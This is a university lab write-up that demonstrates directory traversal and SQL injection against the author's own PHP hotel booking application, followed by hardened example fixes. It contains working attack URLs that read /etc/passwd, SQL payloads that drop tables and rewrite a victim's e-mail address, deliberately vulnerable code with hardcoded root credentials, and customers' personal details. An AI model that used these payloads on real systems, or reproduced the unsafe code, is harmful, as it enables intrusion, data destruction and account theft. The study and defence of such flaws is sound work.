E0226528 -1-

John Kojo Ampia – Addison

E0226528

033526

Internet - Security VU SS 2008

John Kojo Ampia – Addison Internet Security VU WS 2007


Lab 1: Directory Traversal Attack

This attack is based on a web application for a hotel booking and reservation system that I wrote for a client.
It can be found at: http://www.j2nghana.com/requestform.php
This application registers customers and guides them through a room booking process which, when completed,
generates an invoice for the client to save on their workstation.
This is what normally happens after the invoice generator has completed processing and generated the file:
the invoice-generator script, after generating and storing the invoice on the server, calls the following finished.php
script with a query string containing the client's details and booking information:
http://192.168.1.2/ipayment/finished.php?3=3&fin=finished&customerId=84&invoiceId=100&persons=1&arrival=Jun%2015,%202008,%2000:00&departure=Jun%2025,%202008,%2000:00&days10&file=/var/www/html/ipayment/invoices/84_14-06-2008_invoice_100.pdf
The file parameter of the query-string contains the path to the stored invoice file.
In this attack the file parameter was changed to read file=/etc/passwd, i.e.:

http://192.168.1.2/ipayment/finished.php?3=3&fin=finished&customerId=84&invoiceId=100&persons=1&arrival=Jun%2015,%202008,%2000:00&departure=Jun%2025,%202008,%2000:00&days10&file=/etc/passwd

To the surprise and amazement of this author, the script returned an “application-pdf” file, which however turned out to
be a text file and could be opened in any text editor!

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
named:x:25:25:Named:/var/named:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
jojo:x:500:500::/home/jojo:/bin/bash
postfix:x:89:1000::/var/spool/postfix:/sbin/nologin
proftpd:x:5000:5000:proftpd virtual user:/bin/null:/bin/false
tomcat:x:5001:5001::/etc/tomcat:/sbin/nologin
xms:x:5002:5002::/home/web:/sbin/nologin
courier:x:5003:5003::/usr/local:/bin/bash
vmail:x:1001:5004::/home/vmail:/bin/bash
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash

Practically everything in the /etc/passwd file was returned; for brevity, I have removed some of the entries.
My own account entry is: jojo:x:500:500::/home/jojo:/bin/bash

Now here are the scripts that together did the damage:

The script finished.php contains the following lines, which dutifully take the value of the file parameter without question:

$file='';
if(isset($_REQUEST['file']))$file=$_REQUEST['file'];

The file parameter, together with the fname parameter holding the download file name, is passed on to the
savePDF.php script in a hidden iframe so that the download starts immediately:

<iframe name='fileFrame' id='fileFrame' src="savePDF.php?name=<?=$fname?>&file=<?=$file?>" frameborder='0' width='0' height='0'></iframe>

This is the source of the savePDF.php script:

<?
$name="xyz_reservation_invoice";
if(isset($_GET['name']))$name = $_GET['name'];
$file="";
if(isset($_GET['file']))$file = $_GET['file'];
// the only check is that the path names an existing regular file
if(strlen($file)>0 && is_file($file)){
    //echo $file;
    header('Content-type: application/x-pdf');
    header('Content-Disposition: attachment; filename="'.$name.'"');
    readfile($file);   // any file readable by the web server is sent back
}else die("Failed opening ".$name);
?>

This code simply accepts the parameters, checks that the file exists, and happily returns it to the requester.

There are no checks whatsoever on the type of file or on the directory path involved.

An attacker examining the HTML source code can easily discover the script in the iframe and use it to download
any file the web server is able to read.

I have fixed the application since discovering this vulnerability through this exercise!
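A hardened savePDF.php, added here as an example rather than the author's actual fix; it assumes invoices are stored under /var/www/html/ipayment/invoices (the directory seen in the query string), are named like 84_14-06-2008_invoice_100.pdf with the customer ID as prefix, and that the booking flow keeps the logged-in customer's ID in the session.

```php
<?php
// Hardened replacement for savePDF.php (added example, not the author's own fix).
// Assumption: invoices live under INVOICE_DIR and are named <customerId>_<date>_invoice_<n>.pdf.
define('INVOICE_DIR', '/var/www/html/ipayment/invoices');

function resolveInvoicePath(string $requested, int $customerId): ?string {
    // Drop any directory part: only a bare file name inside INVOICE_DIR is ever served.
    $base = basename($requested);
    // Whitelist the name format and require the leading customer ID to match the
    // authenticated customer, so one customer cannot fetch another's invoice.
    if (!preg_match('/^(\d+)_[A-Za-z0-9_-]+\.pdf$/', $base, $m) || (int)$m[1] !== $customerId) {
        return null;
    }
    $dir  = realpath(INVOICE_DIR);
    $real = realpath(INVOICE_DIR . '/' . $base);
    // realpath() is false if the file does not exist; the prefix check defeats a
    // symlink placed in the invoice directory that points somewhere else.
    if ($dir === false || $real === false || strpos($real, $dir . '/') !== 0) {
        return null;
    }
    return is_file($real) ? $real : null;
}

session_start();
// Assumption: the booking flow stores the logged-in customer's ID in the session;
// it must not be taken from the query string, where the client can change it.
$customerId = isset($_SESSION['customerId']) ? (int)$_SESSION['customerId'] : 0;
$path = isset($_GET['file']) ? resolveInvoicePath($_GET['file'], $customerId) : null;
if ($path === null) {
    http_response_code(404);
    die('Invoice not found');
}
// The download name is only a hint to the browser, but strip anything that could
// break out of the quoted filename or inject a header (quotes, CR, LF).
$name = isset($_GET['name']) ? preg_replace('/[^A-Za-z0-9._-]/', '_', $_GET['name']) : 'reservation_invoice.pdf';
header('Content-Type: application/pdf');
header('Content-Disposition: attachment; filename="' . $name . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
```

With this check, file=/etc/passwd or file=../../etc/passwd both reduce to a bare name that fails the whitelist, and a valid invoice name belonging to a different customer is refused as well.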

Lab 1: SQL Injection
An SQL injection vulnerability existed in this web application as well.
The following excerpt is drawn from the script idReminder.php, which is used to e-mail a client's ID when the client
asks for a reminder.
Here are the files involved (customers.sql):
CREATE TABLE `customers` (
`ID` smallint(6) NOT NULL auto_increment,
`EMAIL` varchar(80) NOT NULL,
`TITLE` varchar(10) NOT NULL,
`FULLNAME` varchar(240) NOT NULL,
`ADDRESS` varchar(240) NOT NULL,
`ZIP` varchar(100) NOT NULL,
`CITY` varchar(200) NOT NULL,
`REGION` varchar(200) NOT NULL,
`COUNTRY` varchar(200) NOT NULL,
`TELEPHONE` varchar(50) NOT NULL,
`MOBILE` varchar(50) NOT NULL,
PRIMARY KEY (`ID`,`EMAIL`),
UNIQUE KEY `EMAIL` (`EMAIL`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 PACK_KEYS=0 AUTO_INCREMENT=84;

Some data entries:


INSERT INTO `customers` (`ID`, `EMAIL`, `TITLE`, `FULLNAME`, `ADDRESS`, `ZIP`, `CITY`, `REGION`,
`COUNTRY`, `TELEPHONE`, `MOBILE`) VALUES(1, 'jojoaddison@yahoo.com', '&nbsp;', 'Jojo Addison',
'Burggasse 51/8/1/62', 'A-1070', 'Vienna', 'Vienna', 'AUSTRIA', '&nbsp;', '&nbsp;');
INSERT INTO `customers` (`ID`, `EMAIL`, `TITLE`, `FULLNAME`, `ADDRESS`, `ZIP`, `CITY`, `REGION`,
`COUNTRY`, `TELEPHONE`, `MOBILE`) VALUES(2, 'kojoampia@yahoo.com', '&nbsp;', 'Kojo Ampia',
'Garnisongasse 14-16/107', 'A-1090', 'Vienna', 'Vienna', 'AUSTRIA',
'&nbsp;', '&nbsp;');

The script contains these lines:


if(isset($_REQUEST['email'])){
    $email = $_REQUEST['email'];            // taken verbatim from the request
    $result = getCustomerFromEmail($email);
    if(isset($result)){
        $Header="From: <office@support-service.com>\r\nReply-To: Support <office@support-service.com>\r\n";
        $sent = mail($email,'Support ID Reminder',$result,$Header);
    }
}

function getCustomerFromEmail($email=''){
    $host = "localhost"; $username="root"; $passwd="secret"; $dbase="reservationDB";
    if(!mysql_connect($host,$username,$passwd)){die("Could not connect to Database");}
    if(!mysql_select_db($dbase)){ die("Failed to select database $dbase: " . mysql_error());}
    // the e-mail address is concatenated straight into the SQL text
    $sql="SELECT ID FROM customers WHERE EMAIL='".$email."'";
    $result = mysql_query($sql);
    // mysql_query() returns false on failure, so test for that rather than isset()
    if($result === false)die("Failed to execute query [$sql] : " . mysql_error());
    if($row = mysql_fetch_assoc($result)){$result = $row['ID'];}
    return $result;
}

Although the above code works correctly in returning the IDs associated with the e-mail address, no validation
is performed on the input parameter, so the following manipulation:
http://192.168.1.2/ipayment/idReminder.php?email=jojoaddison@yahoo.com’%20OR%201%3D1%20--%20

will result in the following query:


SELECT ID FROM customers WHERE EMAIL='jojoaddison@yahoo.com' OR 1=1 -- '

A more malicious user who knows the table name could do much more harm with this:
http://192.168.1.2/ipayment/idReminder.php?email=jojoaddison@yahoo.com’%20OR%201%3D1%20;DROP%20TABLE%20customers%20--%20

resulting in this query, which destroys the customer table completely:

SELECT ID FROM customers WHERE EMAIL='jojoaddison@yahoo.com' OR 1=1; DROP TABLE customers -- '

Even when poking around blindly with a brute-force approach, it is only a matter of time before a determined attacker
discovers the table name using variants of the probes below:

SELECT ID FROM customers WHERE EMAIL='x' AND 1=(SELECT COUNT(*) FROM tabname); --';

The following, though, confirms that the table name is correct when the error "Sorry we did not find any records
that match the email address: x" is returned:
SELECT ID FROM customers WHERE EMAIL='x' AND customers.email IS NULL; --';

Given the behaviour of the above manipulations, it is clear that a malicious attacker can even update the record of
another user on the system by changing the victim's e-mail address to one of the attacker's choice, as shown
further on.
First, though, the following confirms the existence of a valid user:

SELECT ID FROM customers WHERE EMAIL = 'x' OR FULLNAME LIKE '%jo%';

Another brute-force probe confirms that the user jojoaddison@yahoo.com actually exists, through the confirmation
message that the ID has been sent:

SELECT ID FROM customers WHERE EMAIL = 'jojoaddison@yahoo.com';

Consequently, the attacker can then update the entry with an e-mail address of the attacker's choice:

SELECT ID FROM customers WHERE EMAIL= 'x'; UPDATE customers SET email = 'wizzi@killwizards.net' WHERE email = 'jojoaddison@yahoo.com';

The attacker would then come back and use the idReminder.php script to get the ID of the victim posted via email.
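A safe replacement for getCustomerFromEmail() and the mailing code in idReminder.php, covering both the tautology/comment injection and the enumeration probes above; this is an added example, not the author's actual fix, and it assumes mysqli, the customers table from customers.sql, and placeholder credentials DB_USER/DB_PASSWORD for a least-privilege database account.

```php
<?php
// Safe replacement for getCustomerFromEmail() and idReminder.php (added example, not
// the author's own fix). Assumes mysqli and the customers table from customers.sql;
// DB_USER / DB_PASSWORD are placeholders for an account with SELECT only, not root.
function getCustomerFromEmail(mysqli $db, string $email): ?int {
    // Reject anything that is not syntactically an address (this also rules out
    // CR/LF, so the value is safe to reuse as the mail() recipient below).
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    // The statement text is fixed at prepare time and the address is bound as
    // data, so quotes, "OR 1=1" or "--" inside it cannot change the query.
    $stmt = $db->prepare('SELECT ID FROM customers WHERE EMAIL = ? LIMIT 1');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $id = null;
    $stmt->bind_result($id);
    $found = $stmt->fetch();
    $stmt->close();
    return $found ? (int)$id : null;
}

$db = new mysqli('localhost', 'DB_USER', 'DB_PASSWORD', 'reservationDB');
if ($db->connect_error) {
    die('Could not connect to Database');
}
$email = isset($_REQUEST['email']) ? $_REQUEST['email'] : '';
$id = getCustomerFromEmail($db, $email);
if ($id !== null) {
    $header = "From: <office@support-service.com>\r\nReply-To: Support <office@support-service.com>\r\n";
    mail($email, 'Support ID Reminder', (string)$id, $header);
}
// Same response whether or not the address is registered, so the script cannot be
// used as an oracle to confirm which addresses, users or table names exist.
echo 'If the address is registered, a reminder has been sent.';
```

PHP's legacy mysql_query() sends a single statement, so the stacked ";DROP TABLE" and ";UPDATE" payloads above depend on a driver that allows multiple statements, whereas the tautology and comment variants work with any driver. Parameter binding removes all of them, and a database account without DROP or UPDATE rights limits the damage should anything else slip through.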
